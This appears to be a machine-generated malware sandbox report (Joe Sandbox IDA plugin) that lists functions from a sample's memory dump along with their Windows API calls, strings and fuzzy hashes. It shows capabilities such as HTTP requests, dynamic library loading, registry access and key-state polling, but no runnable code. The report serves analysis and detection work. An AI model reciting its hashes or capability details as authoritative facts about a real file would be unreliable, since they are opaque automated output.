Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 26cfea74514221fd1bf0126ac464c926ee1707bc258a485eab9e1735763e326d
Instruction ID: 460768536cb350f3ee615016a07eba4cc2f48de0640920df61b9c2f075c60654
Opcode Fuzzy Hash: 26cfea74514221fd1bf0126ac464c926ee1707bc258a485eab9e1735763e326d
Instruction Fuzzy Hash: AA4148B5600305FFDB05CF95CC85BAA7BA9EF44350B1481AAEA09AF305D7B1D944CBB0

Function 00DD5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DD5A93
GetMenuItemInfoW.USER32 ref: 00DD5AAF
DeleteMenu.USER32(00000004,00000007,00000000), ref: 00DD5AF5
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E518F0,00000000), ref: 00DD5B3E

Strings

0, xrefs: 00DD5A8B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: c35c39adca41881d4c16d7b05428f472780d920ce6735b56ccacb96df24387ee
Instruction ID: 2de530b0923ccc99919e1ef8cf9a8f670ee114aad7fa6dcbb5c0a7453a85add0
Opcode Fuzzy Hash: c35c39adca41881d4c16d7b05428f472780d920ce6735b56ccacb96df24387ee
Instruction Fuzzy Hash: D6417C712047019FDB109F24E884B5ABBE5EF88314F09465FF9A59B3D5D770A8048B76

Function 00DF0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00DF0478

Part of subcall function 00D97F40: _memmove.LIBCMT ref: 00D97F8F

Part of subcall function 00D9A2FB: _memmove.LIBCMT ref: 00D9A33D

Strings

stdcall, xrefs: 00DF04FA
winapi, xrefs: 00DF04E9
cdecl, xrefs: 00DF04CF
none, xrefs: 00DF0553

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2411302734-567219261
Opcode ID: 2d5b07dec7397bf8989b32f821a8fe1b9dec496ac5f0af5cb26a6f27e08b8443
Instruction ID: b3fded992a02b3108cc67f92499f127a2ac726b7fe4752155e76ab6d86e217aa
Opcode Fuzzy Hash: 2d5b07dec7397bf8989b32f821a8fe1b9dec496ac5f0af5cb26a6f27e08b8443
Instruction Fuzzy Hash: AD31A570500619ABCF00DF58D8419FEB7B5FF05350B148A29E562A72D6DB71E905CBB0

Function 00DCC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00DCC684
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00DCC697
SendMessageW.USER32(?,00000189,?,00000000), ref: 00DCC6C7

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

Strings

ListBox, xrefs: 00DCC643
ComboBox, xrefs: 00DCC60B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$_memmove
String ID: ComboBox$ListBox
API String ID: 458670788-1403004172
Opcode ID: 4ed029885bee29ae8b2ea7a28a8b1cbf97d498c6b0f484527766b7e2320b76d6
Instruction ID: db34966370d3014311cc7bbf4e96208e1b8e2ee9682cc65eac75cc91fc6164cc
Opcode Fuzzy Hash: 4ed029885bee29ae8b2ea7a28a8b1cbf97d498c6b0f484527766b7e2320b76d6
Instruction Fuzzy Hash: 4421E1B1940105AEDB04EBA4DC86EFFBBA8DF05350B14961DF526E31E0DB745D0A9734

Function 00DE4A41 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DE4A60
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DE4A86
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DE4AB6
InternetCloseHandle.WININET(00000000), ref: 00DE4AFD

Part of subcall function 00DE56A9: GetLastError.KERNEL32(?,?,00DE4A2B,00000000,00000000,00000001), ref: 00DE56BE

Strings

, xrefs: 00DE4AAF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 9b1436838830e342c53a4da7d60051b8f90e9740b599f91b200e02dad69cba9f
Instruction ID: 51c72a8940ab367fd409cafff8329f9eb08fb98036b20d879160f1f31c309eef
Opcode Fuzzy Hash: 9b1436838830e342c53a4da7d60051b8f90e9740b599f91b200e02dad69cba9f
Instruction Fuzzy Hash: 2821CDB6544208BFEB11EF669C84EBFB6FCEB88B98F10402AF505E6140EA64DD058775

Function 00D938E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E0454E

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

_memset.LIBCMT ref: 00D93965
_wcscpy.LIBCMT ref: 00D939B5
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D939C6

Strings

Line: , xrefs: 00E04578

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: cdbbddac79696e5335e96dfd6e3e91b78f82708f23256a0622c3f97d370649ea
Instruction ID: 6ad29675cd540387218e52eade51d7bf51013223b7dc8411e2a79c5d87e40c0c
Opcode Fuzzy Hash: cdbbddac79696e5335e96dfd6e3e91b78f82708f23256a0622c3f97d370649ea
Instruction Fuzzy Hash: 2B31B371408340BFDB25EB61DC45BDBB7E8EB44315F00495AF695A21A1DB709B4CCBB2

Function 00DF8EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DAC657
Part of subcall function 00DAC619: GetStockObject.GDI32(00000011), ref: 00DAC66B
Part of subcall function 00DAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DAC675

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DF8F69
LoadLibraryW.KERNEL32(?), ref: 00DF8F70
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DF8F85
DestroyWindow.USER32(?), ref: 00DF8F8D

Strings

SysAnimate32, xrefs: 00DF8F44

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 92c3d4eca2f2caf872d1af4d0d94e9915c688635e2e873ea7276df1b426a499a
Instruction ID: a239c0079dbacfc1235c6262305903bdf06e71067afc2edeaaa3ff912e886bd3
Opcode Fuzzy Hash: 92c3d4eca2f2caf872d1af4d0d94e9915c688635e2e873ea7276df1b426a499a
Instruction Fuzzy Hash: C1219D71204209AFEF104E64DC80EBB77AAEF49368F168628FB54A7190CB71DC50A772

Function 00DDE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00DDE392
GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 00DDE3E6
__swprintf.LIBCMT ref: 00DDE3FF
SetErrorMode.KERNEL32(00000000,00000001,00000000,00E2DBF0), ref: 00DDE43D

Strings

%lu, xrefs: 00DDE3F9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5f8ca6e474e4fc52991811db8a4c8351ad3ea8d15295fd8ef84b3745c9e8358f
Instruction ID: 0478c6506ecd93bd3fd3b846c7b16803f352889afe69174bddd8a1e24159745b
Opcode Fuzzy Hash: 5f8ca6e474e4fc52991811db8a4c8351ad3ea8d15295fd8ef84b3745c9e8358f
Instruction Fuzzy Hash: 33214F35A40208AFCB10EFA5DC85DEEB7B8EF59714B108069F509EB251D631DA05CB70

Function 00DCD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

Part of subcall function 00DCD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DCD640
Part of subcall function 00DCD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCD653
Part of subcall function 00DCD623: GetCurrentThreadId.KERNEL32 ref: 00DCD65A
Part of subcall function 00DCD623: AttachThreadInput.USER32(00000000), ref: 00DCD661

GetFocus.USER32 ref: 00DCD7FB

Part of subcall function 00DCD66C: GetParent.USER32(?), ref: 00DCD67A

GetClassNameW.USER32(?,?,00000100), ref: 00DCD844
EnumChildWindows.USER32(?,00DCD8BA), ref: 00DCD86C
__swprintf.LIBCMT ref: 00DCD886

Strings

%s%d, xrefs: 00DCD880

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 46567f7d24b2e19587c40e1e295060c25d872a31f79f0b6882a6a245b3d1abdc
Instruction ID: 05f11647f0d1b9850233c35b7d5cbfeaedd134fd026d0131b5f31d22fcdd9500
Opcode Fuzzy Hash: 46567f7d24b2e19587c40e1e295060c25d872a31f79f0b6882a6a245b3d1abdc
Instruction Fuzzy Hash: 8811847154420A6BDF127F909C85FEA376AEF44704F0080BDBE0DAB186DB745945DB70

Function 00DF1836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DF18E4
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DF1917
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DF1A3A
CloseHandle.KERNEL32(?), ref: 00DF1AB0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 4f88c1400b3b74c229354644f47ab612c494ba21c8ff88cb058297a3ab8fc153
Instruction ID: 447a997139b972472fed05ca1fc807375e1d1594f617198da591e87fbddfa85a
Opcode Fuzzy Hash: 4f88c1400b3b74c229354644f47ab612c494ba21c8ff88cb058297a3ab8fc153
Instruction Fuzzy Hash: EF817C74A40204EBDF109F65C886BADBBE5EF49720F09C459F905AF382D7B4E9458BB0

Function 00DF0579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00DF05DF
GetProcAddress.KERNEL32(00000000,?), ref: 00DF066E
GetProcAddress.KERNEL32(00000000,00000000), ref: 00DF068C
GetProcAddress.KERNEL32(00000000,?), ref: 00DF06D2
FreeLibrary.KERNEL32(00000000,00000004), ref: 00DF06EC

Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF282
Part of subcall function 00DAF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00DDAEA5,?,?,00000000,00000008), ref: 00DAF2A6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 42eec7da8c6cc9af7b2a095c8823755be6cd7541d80fa99e2d4c400fd74d48a7
Instruction ID: fc00a1a3214c18ba991b8e3fd9d01904faf1bbdbb3aee7b3032478ef9023fe63
Opcode Fuzzy Hash: 42eec7da8c6cc9af7b2a095c8823755be6cd7541d80fa99e2d4c400fd74d48a7
Instruction Fuzzy Hash: E9513A75A002099FCF00EFA8C9949ADBBB5EF49310B19C0A5EA55AB352DB30ED45CB70

Function 00DF2D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

Part of subcall function 00DF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DF2DE0
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DF2E1F
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DF2E66
RegCloseKey.ADVAPI32(?,?), ref: 00DF2E92
RegCloseKey.ADVAPI32(00000000), ref: 00DF2E9F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 342d11540c5e5c8c3087a5eca9ddda2329ef47402168e73c6d4547eae8ce4706
Instruction ID: 272344f6ec6e0774d824d9f3929ecb323004c66a1de093f9a1fa4c06309c3218
Opcode Fuzzy Hash: 342d11540c5e5c8c3087a5eca9ddda2329ef47402168e73c6d4547eae8ce4706
Instruction Fuzzy Hash: 1A514C71218209AFCB04EF64CC81E7AB7E9FF88314F14891DF695972A1DB31E905CB62

Function 00DFCB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533b7fc68e3cc664aad8b9db10da27e3016e6412d86f7a2b4b252d1cbaf17325
Instruction ID: 205d859f32de851054d3fd31ecd9109305f998cf08994d97251499b8619ec877
Opcode Fuzzy Hash: 533b7fc68e3cc664aad8b9db10da27e3016e6412d86f7a2b4b252d1cbaf17325
Instruction Fuzzy Hash: 0F41023991020CAFD724DF28CE49FF9BB69EB09320F1AD251EA59E72D0C7309D24D660

Function 00DE1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE17D4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00DE17FD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE183C

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE1861
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE1869

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b0ed5048de812755bd9ed5f23ee480c2edb559a1ad5c5899c40a3b4f39974446
Instruction ID: 4ee087c57823d640f023bfb02915ff8668526ff79f5fb08f5649391babf02682
Opcode Fuzzy Hash: b0ed5048de812755bd9ed5f23ee480c2edb559a1ad5c5899c40a3b4f39974446
Instruction Fuzzy Hash: F241F735A00205EFCF11EF65C981AADBBF5EF49314B148099E80AAB362DB31ED51DB70

Function 00DAB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 00DAB749
ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
GetAsyncKeyState.USER32(00000002), ref: 00DAB799

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: debabc2a45594ecc393c016abaff58b00f096df1bbfdeb2b52b6f263f7183178
Instruction ID: 2fd130b8cce1c263d5cb24744282afecd8287cd80771b13387fefe92d8ff67f0
Opcode Fuzzy Hash: debabc2a45594ecc393c016abaff58b00f096df1bbfdeb2b52b6f263f7183178
